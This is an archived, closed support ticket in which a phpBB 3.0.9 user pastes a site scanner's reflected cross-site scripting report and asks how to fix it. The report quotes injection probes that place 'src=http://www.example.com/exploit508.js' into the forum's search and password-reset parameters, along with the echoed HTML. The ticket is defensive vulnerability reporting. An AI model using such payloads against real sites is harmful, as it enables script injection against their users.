Uploaded image for project: 'Support Team Tools'
  1. Support Team Tools
  2. STT-267

help : i have something at security

This issue belongs to an archived project. You can view it, but you can't modify it. Learn more

    XMLWordPrintable

Details

    • Bug
    • Status: Closed
    • Resolution: Invalid
    • Other
    • None

    Description

      hi:

      site scanner send to me this message and i don,t know what i do

      Status:
       
      Not yet addressed
      Synopsis:
       
      The remote web server is prone to cross-site scripting attacks.
      Description:
       
      The remote web server hosts one or more cgi scripts that fail to
      adequately sanitize request strings with malicious JavaScript. By
      leveraging this issue, an attacker may be able to cause arbitrary HTML
      and script code to be executed in a user's browser within the security
      context of the affected site. These XSS vulnerabilities are likely to
      be 'non-persistent' or 'reflected'.
      See Also:
       
      http://en.wikipedia.org/wiki/Cross_site_scripting#Non-persistent
      http://www.Site Scanner.org/u?9717ad85
      http://projects.webappsec.org/Cross-Site+Scripting
      Risk Factor:
       
      Medium / CVSS Base Score : 4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)
      Solution:
       
      Restrict access to the vulnerable application. Contact the vendor
      for a patch or upgrade.
       
      Output:
       
      Using the POST HTTP method, Site Scanner found that :
      + The following resources may be vulnerable to cross-site scripting (extended patterns) :
      + The 'terms' parameter of the /forum/search.php CGI :
      /forum/search.php?&sr=topics&search_id=unreadposts [terms=508 src=http:/
      /www.example.com/exploit508.js]
      -------- output --------
      <br />
      <form method="post" action="./search.php?&amp;sr=topics&amp;search_id=un
      readposts&amp;terms=508 src=http://www.example.com/exploit508.js">
      <table width="100%" cellspacing="1">
      ------------------------
      + The 'username' parameter of the /forum/ucp.php CGI :
      /forum/ucp.php?mode=sendpassword [username=508 src=http://www.example.co
      m/exploit508.js]
      -------- output --------
      <tr>
      <td class="row1" width="38%"><b class="genmed"> [...]
      <td class="row2"><input type="text" class="post" name="username" size="2
      5" value="508 src=http://www.example.com/exploit508.js" /></td>
      </tr>
      <tr>
      ------------------------
      Other references : CWE:79, CWE:80, CWE:81, CWE:83, CWE:20, CWE:74, CWE:442, CWE:712, CWE:722, CWE:725, CWE:811, CWE:751, CWE:801, CWE:116, CWE:692, CWE:86

      i use phpbb3.0.9

      and used godaddy site scanner

      please tell me . Solve this problem

      Attachments

        Activity

          People

            Noxwizard Patrick Webster
            egyptianweb egyptianweb [X] (Inactive)
            Archiver:
            Noxwizard Patrick Webster

            Dates

              Created:
              Updated:
              Resolved:
              Archived: